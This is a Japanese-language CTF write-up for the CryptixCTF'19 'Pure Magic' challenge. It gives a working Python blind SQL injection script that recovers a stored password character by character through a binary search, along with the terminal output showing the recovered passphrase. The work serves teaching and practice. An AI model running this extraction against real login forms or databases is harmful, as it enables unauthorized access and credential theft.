CryptixCTF'19 Writeup - Pure Magic
普通のBlind SQL Injectionの問題だが、いつも適当にリニアサーチで解いていたところをバイナリサーチで実装したので、メモとして残しておく。
Like all fairy tails, you need a passphrase to pass through the cave and get the flag! NOTE: The flag format is flag{XXXXX} as usual.
' or 1=1#
You thought it would be that easy?! Hahaha. There is no flag. But since you have passed the phrase check, here is the query SELECT * FROM data where password='XXXXX' :)
Blind SQL Injectionでパスフレーズを特定する。
#!/usr/bin/env python # -*- coding: utf-8 -*- import requests import string import time URL = '' target = "" def trace_request(req): print("[+] request start") print('{}\n{}\n\n{}'.format( req.method + ' ' + req.url, '\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()), req.body, )) print("[+] request end") def trace_response(res): print("[+] response start") print('{}\n{}\n\n{}'.format( res.status_code, '\n'.join('{}: {}'.format(k, v) for k, v in res.headers.items()), res.content, )) print("[+] response end") def challenge(offset, guess): req = requests.Request( 'POST', URL, data={ "pwd" : "' or ASCII(SUBSTRING((select password from data limit 0, 1),{},1)) < {} #".format(offset + 1, guess) } ) prepared = req.prepare() #trace_request(prepared) session = requests.Session() #start = time.time() # TimeBased用 res = session.send(prepared, allow_redirects = False) #elapsed_time = time.time() - start # TimeBased用 #trace_response(res) if "There is no flag" in res.content.decode("utf-8"): return True # 取得したい文字の文字コードは予想文字の文字コードより小さい else: return False # 取得したい文字の文字コードは予想文字の文字コード以上 def binarySearch(offset): low = 0 high = 256 while low <= high: guess = (low + high) // 2 is_target_lessthan_guess = challenge(offset, guess) if is_target_lessthan_guess: high = guess else: low = guess if high == 1: return -1 elif high - low == 1: return low while True: code = binarySearch(len(target)) if code == -1: break target += chr(code) print("[+] target: " + target) print("[+] target: " + target)
root@kali:/mnt/CTF/Contest# python3 [+] target: B [+] target: Bl [+] target: Bl1 [+] target: Bl1n [+] target: Bl1nD [+] target: Bl1nD_ [+] target: Bl1nD_S [+] target: Bl1nD_S0 [+] target: Bl1nD_S0r [+] target: Bl1nD_S0rc [+] target: Bl1nD_S0rc3 [+] target: Bl1nD_S0rc3r [+] target: Bl1nD_S0rc3r3 [+] target: Bl1nD_S0rc3r3r [+] target: Bl1nD_S0rc3r3ry [+] target: Bl1nD_S0rc3r3ry